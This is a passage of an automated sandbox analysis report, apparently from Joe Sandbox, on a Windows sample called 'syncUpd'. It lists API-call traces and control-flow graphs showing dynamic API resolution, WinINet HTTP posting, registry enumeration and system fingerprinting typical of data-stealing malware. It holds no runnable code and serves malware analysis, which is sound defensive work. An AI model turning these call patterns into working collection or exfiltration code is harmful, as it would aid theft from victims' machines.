• GetProcAddress.KERNEL32(75900000,00941180), ref: 00415F11
• GetProcAddress.KERNEL32(75900000,00941198), ref: 00415F2A
• GetProcAddress.KERNEL32(75900000,00941360), ref: 00415F42
• GetProcAddress.KERNEL32(75900000,009413A8), ref: 00415F5A
• GetProcAddress.KERNEL32(75900000,00941390), ref: 00415F73
• GetProcAddress.KERNEL32(75900000,0095C7E0), ref: 00415F8B
• GetProcAddress.KERNEL32(75900000,0095C0D8), ref: 00415FA3
• GetProcAddress.KERNEL32(75900000,0095C098), ref: 00415FBC
• GetProcAddress.KERNEL32(75900000,00941378), ref: 00415FD4
• GetProcAddress.KERNEL32(75900000,009413C0), ref: 00415FEC
• GetProcAddress.KERNEL32(75900000,009413D8), ref: 00416005
• GetProcAddress.KERNEL32(75900000,009413F0), ref: 0041601D
• GetProcAddress.KERNEL32(75900000,0095BD78), ref: 00416035
• GetProcAddress.KERNEL32(75900000,00941408), ref: 0041604E
• GetProcAddress.KERNEL32(75900000,00941348), ref: 00416066
• GetProcAddress.KERNEL32(75900000,0095C018), ref: 0041607E
• GetProcAddress.KERNEL32(75900000,0095D760), ref: 00416097
• GetProcAddress.KERNEL32(75900000,0095D880), ref: 004160AF
• GetProcAddress.KERNEL32(75900000,0095BD58), ref: 004160C7
• GetProcAddress.KERNEL32(75900000,0095D748), ref: 004160E0
• GetProcAddress.KERNEL32(75900000,0095C038), ref: 004160F8
• LoadLibraryA.KERNEL32(0095D868,?,004136C0), ref: 0041610A
• LoadLibraryA.KERNEL32(0095D5C8,?,004136C0), ref: 0041611B
• LoadLibraryA.KERNEL32(0095D5E0,?,004136C0), ref: 0041612D
• LoadLibraryA.KERNEL32(0095D7D8,?,004136C0), ref: 0041613F
• LoadLibraryA.KERNEL32(0095D6E8,?,004136C0), ref: 00416150
• GetProcAddress.KERNEL32(75070000,0095D640), ref: 00416172
• GetProcAddress.KERNEL32(75FD0000,0095D700), ref: 00416193
• GetProcAddress.KERNEL32(75FD0000,0095D838), ref: 004161AB
• GetProcAddress.KERNEL32(75A50000,0095D7A8), ref: 004161CD
• GetProcAddress.KERNEL32(74E50000,0095BE18), ref: 004161EE
• GetProcAddress.KERNEL32(76E80000,0095C7F0), ref: 0041620F
• GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00416226
Strings
• NtQueryInformationProcess, xrefs: 0041621A
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: NtQueryInformationProcess
• API String ID: 2238633743-2781105232
• Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
• Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
• Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
• Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                                • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095DC90), ref: 00404ED9
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,0095DC20,?,00965658,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0095DCA0,00000000,?,0095FEE0,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405417
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                                                              • String ID: ------$"$"$"$--$------$------$------$8me
                                                                                                                                                                                                                                                              • API String ID: 2633831070-4183386520
                                                                                                                                                                                                                                                              • Opcode ID: 621bdba30baf4891ab83dce99178415b5fbd469afe96ca80ea55588cdf1fe0f4
                                                                                                                                                                                                                                                              • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 621bdba30baf4891ab83dce99178415b5fbd469afe96ca80ea55588cdf1fe0f4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 303 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 318 4056d4-4056d8 303->318 319 4056cd 303->319 320 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 318->320 321 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 318->321 319->318 330 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 320->330 331 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 320->331 321->320 405 40585c-40586a 321->405 331->330 406 405878 405->406 407 40586c-405876 405->407 408 405882-4058b5 HttpOpenRequestA 406->408 407->408 409 405c63-405c6a InternetCloseHandle 408->409 410 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 408->410 409->320 519 405be2-405c0c InternetReadFile 410->519 520 
405c17-405c5d InternetCloseHandle 519->520 521 405c0e-405c15 519->521 520->409 521->520 522 405c19-405c57 call 416fb0 call 416ea0 call 416e00 521->522 522->519
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095DC90), ref: 004056C3
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,0095DD00,00000000,?,0095FEE0,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                                                              • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,0095DC20,?,00965658,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                                              • String ID: "$"$------$------$------$8me$-A$-A
                                                                                                                                                                                                                                                              • API String ID: 148854478-3677574302
                                                                                                                                                                                                                                                              • Opcode ID: d17a967b76ce1ee735f1f47082f8f9b027be3ac0b8b0cfcc2167a6bfdfd9e736
                                                                                                                                                                                                                                                              • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d17a967b76ce1ee735f1f47082f8f9b027be3ac0b8b0cfcc2167a6bfdfd9e736
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              control_flow_graph 530 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 545 404604 530->545 546 40460b-40460f 530->546 545->546 547 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 546->547 548 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 546->548 547->548 634 404793-404797 547->634 558 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 548->558 559 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 548->559 559->558 635 4047a5 634->635 636 404799-4047a3 634->636 637 4047af-4047e2 HttpOpenRequestA 635->637 636->637 638 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 637->638 639 404b7e-404b85 InternetCloseHandle 637->639 750 404af2-404b1c InternetReadFile 638->750 639->548 751 404b27-404b79 InternetCloseHandle call 416e00 750->751 752 404b1e-404b25 750->752 751->639 752->751 753 404b29-404b67 call 416fb0 call 416ea0 call 416e00 752->753 753->750
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095DC90), ref: 004045FA
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,0095DC40), ref: 00404AA8
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(00000000,0095DC20,?,00965658,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                                              • String ID: "$"$------$------$------$8me
                                                                                                                                                                                                                                                              • API String ID: 460715078-2873308080
                                                                                                                                                                                                                                                              • Opcode ID: 879f56fd817f8a8f66353b252f5d0a865072bf09ff82b57927e01de9d3cd6eeb
                                                                                                                                                                                                                                                              • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 879f56fd817f8a8f66353b252f5d0a865072bf09ff82b57927e01de9d3cd6eeb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,009620A8,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                              • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                                                              • Opcode ID: 8debdc7a5708c493459ae8adcdded4386842cb9c270a7d87b6ae7233fe7e035b
                                                                                                                                                                                                                                                              • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8debdc7a5708c493459ae8adcdded4386842cb9c270a7d87b6ae7233fe7e035b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
• HeapAlloc.KERNEL32(00000000), ref: 004142A7
• wsprintfA.USER32 ref: 004142DD
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
• String ID: :$C$\
• API String ID: 3790021787-3809124531
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00964718,00000000,?,0041D774,00000000,?,00000000,00000000,?,00964778), ref: 0041496D
• HeapAlloc.KERNEL32(00000000), ref: 00414974
• GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
• __aulldiv.LIBCMT ref: 004149AF
• __aulldiv.LIBCMT ref: 004149BD
• wsprintfA.USER32 ref: 004149E9
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
• String ID: %d MB$@
• API String ID: 2886426298-3474575989
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 008F024D
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941180), ref: 00415F11
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941198), ref: 00415F2A
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,00941360), ref: 00415F42
  • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,009413A8), ref: 00415F5A
